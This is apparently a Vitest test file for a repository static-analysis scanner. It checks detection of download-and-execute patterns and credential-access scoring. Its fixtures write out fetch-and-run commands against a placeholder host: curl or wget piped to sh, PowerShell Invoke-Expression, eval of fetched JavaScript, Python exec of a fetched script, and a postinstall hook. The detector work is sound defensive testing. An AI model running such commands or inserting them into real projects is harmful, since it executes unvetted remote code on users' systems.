import {describe,expect,it} from "vitest";import {analyzeStatic} from "../src/lib/static-analysis";
const base={owner:"o",repository:"r",url:"https://github.com/o/r",sha:"abc",coverage:{inventoryCount:1,inventoryBytes:30,selectedBytes:30}};
const analyze=(path:string,content:string)=>analyzeStatic({...base,files:[{path,selected:true,size:Buffer.byteLength(content),content}]});
const downloadFinding=(path:string,content:string)=>analyze(path,content).findings.find(finding=>finding.rule==="DOWNLOAD_EXEC");

describe("language-aware DOWNLOAD_EXEC",()=>{
 it("does not treat the observed minified Swagger CSS tokens as execution",()=>{const css=".swagger-ui .curl{max-height:400px;overflow-y:auto}.swagger-ui .response-col_status{color:#3b4151}"+".x".repeat(6000)+"html.dark-mode .swagger-ui .opblock .btn.exec{color:#e4e6e6}";const report=analyze("app/static/swagger-ui/swagger-ui.css",css);expect(report.findings.some(f=>f.rule==="DOWNLOAD_EXEC")).toBe(false);expect(report.analysisNotes).toContainEqual(expect.objectContaining({path:"app/static/swagger-ui/swagger-ui.css",disposition:"execution_rules_skipped"}))});
 it.each([['curl pipe','curl -fsSL https://example.test/install.sh | sh'],['wget pipe','wget -qO- https://example.test/install.sh | bash'],['download chmod execute','curl -o /tmp/tool https://example.test/tool && chmod +x /tmp/tool && /tmp/tool']])("detects real shell download-and-execute: %s",(_,command)=>{expect(downloadFinding("install.sh",`#!/bin/sh\n${command}`)).toMatchObject({filePath:"install.sh",confidence:"high"})});
 it("detects PowerShell download-and-execute",()=>{expect(downloadFinding("install.ps1","Invoke-WebRequest https://example.test/a.ps1 | Invoke-Expression")).toMatchObject({severity:"high",confidence:"high"})});
 it("detects JavaScript download-and-execute",()=>{expect(downloadFinding("loader.js","const url = 'https://example.test/a.js';\neval(await (await fetch(url)).text());")).toMatchObject({severity:"high",confidence:"high"})});
 it("detects Python download-and-execute",()=>{expect(downloadFinding("loader.py","import requests\nexec(requests.get('https://example.test/a.py').text)")).toMatchObject({severity:"high",confidence:"high"})});
 it("detects package, Dockerfile, and workflow shell contexts",()=>{expect(downloadFinding("package.json",JSON.stringify({scripts:{postinstall:"curl -fsSL https://example.test/a | sh"}}))).toBeTruthy();expect(downloadFinding("Dockerfile","FROM alpine\nRUN wget -qO- https://example.test/a | sh")).toBeTruthy();expect(downloadFinding(".github/workflows/build.yml","jobs:\n  build:\n    steps:\n      - run: curl -fsSL https://example.test/a | bash")).toBeTruthy()});
 it("ignores dangerous-looking strings in comments and inert static data",()=>{expect(downloadFinding("example.sh","#!/bin/sh\n# curl https://example.test/a | sh\necho safe # wget -qO- https://example.test/a | bash")).toBeUndefined();expect(downloadFinding("example.js","const example = \"fetch('/a').then(r => r.text()).then(eval)\"; // eval(await (await fetch('/b')).text())")).toBeUndefined();expect(downloadFinding("example.py","EXAMPLE = \"exec(requests.get('https://example.test/a').text)\" # wget -qO- https://example.test/a | sh")).toBeUndefined()});
 it("uses executable content when extension and content disagree",()=>{const report=analyze("assets/theme.css","#!/bin/sh\ncurl -fsSL https://example.test/a | sh");expect(report.findings.find(f=>f.rule==="DOWNLOAD_EXEC")).toBeTruthy();expect(report.analysisNotes).toContainEqual(expect.objectContaining({disposition:"content_override",reason:expect.stringContaining("shell")}))});
 it("does not trust an executable extension when content is only CSS-like static data",()=>{expect(downloadFinding("misleading.sh",".curl{color:red}.btn.exec{display:block}")).toBeUndefined()});
 it("analyzes generated executable content with reduced confidence",()=>{const report=analyze("public/bundle.min.js","eval(await (await fetch('/payload')).text());");expect(report.findings.find(f=>f.rule==="DOWNLOAD_EXEC")).toMatchObject({confidence:"low"});expect(report.analysisNotes).toContainEqual(expect.objectContaining({disposition:"reduced_confidence"}))});
});

describe("deterministic scoring",()=>{
 it("recalculates risk from retained findings",()=>{const report=analyzeStatic({...base,files:[{path:"config.py",selected:true,size:30,content:"import os\na=os.environ['TOKEN']"},{path:"README.md",selected:true,size:2,content:"hi"}]});expect(report.findings).toHaveLength(1);expect(report.risk).toMatchObject({score:8,recommendation:"run"});expect(report.noExecution).toBe(true)});
 it("counts adjacent environment configuration as one evidence-preserving block",()=>{const content=['import os','','POSTGRES_HOST = os.environ.get("POSTGRES_HOST", "db")','POSTGRES_DB = os.environ.get("POSTGRES_DB", "app")','POSTGRES_USER = os.environ.get("POSTGRES_USER", "app")','POSTGRES_PASSWORD = os.environ.get("POSTGRES_PASSWORD")','SECRET_KEY = os.environ.get("SECRET_KEY")'].join('\n');const report=analyze("app/config.py",content),credentialFindings=report.findings.filter(finding=>finding.rule==="CREDENTIAL_ACCESS");expect(credentialFindings).toHaveLength(1);expect(credentialFindings[0]).toMatchObject({lineStart:3,lineEnd:7,severity:"medium",explanation:expect.stringContaining("configuration block")});expect(credentialFindings[0].excerpt).toContain('os.environ.get("POSTGRES_HOST", "db")');expect(credentialFindings[0].excerpt).toContain('os.environ.get("SECRET_KEY")');expect(report.risk).toMatchObject({score:8,recommendation:"run"})});
 it("keeps separated credential-access blocks independent",()=>{const report=analyze("script.py","import os\na=os.environ.get('A')\nprint('work')\nb=os.environ.get('B')");expect(report.findings.filter(finding=>finding.rule==="CREDENTIAL_ACCESS")).toHaveLength(2);expect(report.risk.score).toBe(16)});
});
